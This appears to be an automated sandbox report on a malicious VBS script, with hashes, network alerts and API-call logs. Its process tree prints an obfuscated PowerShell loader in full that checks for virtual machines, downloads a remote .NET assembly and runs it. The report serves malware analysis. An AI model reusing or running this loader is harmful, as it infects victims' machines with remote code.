Summary | ZeroBOX

bMfk.vbs

Generic Malware Antivirus PowerShell
Category FILE
Machine s1_win7_x6401
Started May 4, 2023, 9:49 a.m.
Completed May 4, 2023, 9:51 a.m.
Size 3.1KB
Type UTF-8 Unicode text, with very long lines, with CRLF line terminators
MD5 93531a051fea874cac3cb8e4fdb84b7f
SHA256 b1234e61a003e8fb4cbc7989903fa338fcc12a1fc9ffb52e458f8e511f99cb8f
CRC32 CC851E4A
ssdeep 48:lJ40mZ6/+IWU/rx7JVNRFZlAQWmiFZoR8iwwNBIV0/koQB5C1yZsVyFqeYvVI3b4:lWXg+jInKsCnq/QDzjQdIrU7ofO
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\bMfk.vbs

    2556
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LxAae = 'J✑B0✑C✑✑PQ✑g✑Ec✑ZQB0✑C0✑QwBp✑G0✑SQBu✑HM✑d✑Bh✑G4✑YwBl✑C✑✑dwBp✑G4✑Mw✑y✑F8✑YwBv✑G0✑c✑B1✑HQ✑ZQBy✑HM✑eQBz✑HQ✑ZQBt✑Ds✑J✑B0✑DI✑I✑✑9✑C✑✑J✑B0✑C4✑TQBh✑G4✑dQBm✑GE✑YwB0✑HU✑cgBl✑HI✑OwBp✑GY✑I✑✑o✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑E0✑dwBh✑HI✑ZQ✑n✑Ck✑I✑✑t✑G8✑cg✑g✑CQ✑d✑✑y✑C4✑QwBv✑G4✑d✑Bh✑Gk✑bgBz✑Cg✑JwBW✑Gk✑cgB0✑HU✑YQBs✑EI✑bwB4✑Cc✑KQ✑g✑C0✑bwBy✑C✑✑J✑B0✑DI✑LgBD✑G8✑bgB0✑GE✑aQBu✑HM✑K✑✑n✑Eg✑eQBw✑GU✑cg✑t✑FY✑Jw✑p✑Ck✑I✑B7✑Ds✑ZQB4✑Gk✑d✑✑7✑H0✑Ow✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑D0✑I✑✑n✑CU✑VQBX✑Fc✑cwBq✑CU✑Jw✑7✑CQ✑QgBY✑Gk✑bwBN✑C✑✑PQ✑g✑Cc✑JQBs✑FU✑cwBO✑FE✑JQ✑n✑Ds✑WwBC✑Hk✑d✑Bl✑Fs✑XQBd✑C✑✑J✑BB✑Gg✑c✑BB✑Fc✑I✑✑9✑C✑✑WwBT✑Hk✑cwB0✑GU✑bQ✑u✑EM✑bwBu✑HY✑ZQBy✑HQ✑XQ✑6✑Do✑RgBy✑G8✑bQBC✑GE✑cwBl✑DY✑N✑BT✑HQ✑cgBp✑G4✑Zw✑o✑C✑✑J✑BC✑Fg✑aQBv✑E0✑LgBS✑GU✑c✑Bs✑GE✑YwBl✑Cg✑JwCTITo✑kyEn✑Cw✑I✑✑n✑EE✑Jw✑p✑C✑✑KQ✑7✑Fs✑UwB5✑HM✑d✑Bl✑G0✑LgBB✑H✑✑c✑BE✑G8✑bQBh✑Gk✑bgBd✑Do✑OgBD✑HU✑cgBy✑GU✑bgB0✑EQ✑bwBt✑GE✑aQBu✑C4✑T✑Bv✑GE✑Z✑✑o✑CQ✑QQBo✑H✑✑QQBX✑Ck✑LgBH✑GU✑d✑BU✑Hk✑c✑Bl✑Cg✑JwBD✑Gw✑YQBz✑HM✑T✑Bp✑GI✑cgBh✑HI✑eQ✑z✑C4✑QwBs✑GE✑cwBz✑DE✑Jw✑p✑C4✑RwBl✑HQ✑TQBl✑HQ✑a✑Bv✑GQ✑K✑✑n✑H✑✑cgBG✑FY✑SQ✑n✑Ck✑LgBJ✑G4✑dgBv✑Gs✑ZQ✑o✑CQ✑bgB1✑Gw✑b✑✑s✑C✑✑WwBv✑GI✑agBl✑GM✑d✑Bb✑F0✑XQ✑g✑Cg✑Jw✑0✑DY✑ZQBz✑GE✑QgBy✑GU✑dgBy✑GU✑Uw✑v✑G4✑aQBh✑G0✑LwBy✑GU✑d✑Bw✑Hk✑cgBj✑H✑✑VQ✑v✑Dg✑Nw✑1✑DE✑bwBh✑G8✑agBQ✑C8✑bQBv✑GM✑LgB0✑G4✑ZQB0✑G4✑bwBj✑HI✑ZQBz✑HU✑YgB1✑Gg✑d✑Bp✑Gc✑LgB3✑GE✑cg✑v✑C8✑OgBz✑H✑✑d✑B0✑Gg✑Jw✑g✑Cw✑I✑✑k✑E8✑W✑BQ✑Ho✑Rw✑g✑Cw✑I✑✑n✑FQ✑cgB1✑GU✑Jw✑g✑Ck✑I✑✑p✑✑==';$UrNXf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $LxAae.replace('✑','A') ) ).replace('%lUsNQ%','').replace('%UWWsj%','C:\Users\test22\AppData\Local\Temp\bMfk.vbs');powershell -Command $UrNXf

      2652

IP Address Status Action
164.124.101.2 Active Moloch
185.199.108.133 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.199.108.133:443 -> 192.168.56.101:49162 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.101:49161 -> 185.199.108.133:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Unexpected token 'B0âœ'Câœ'âœ'PQâœ'gâœ'Ecâœ'ZQB0âœ'C0âœ'QwBpâœ'G0âœ'SQBuâœ'HMâœ
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: œ'âœ'pâœ'âœ'=='' in expression or statement.
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: At line:1 char:2224
console_handle: 0x0000017f
1 1 0

Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004548b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004553f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00454838
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00454838
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00454838
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004550f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00455578
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x004554b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a91000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a92000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05030000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05031000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05032000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05033000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05034000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05035000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05036000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05037000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05038000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05039000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0503f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell
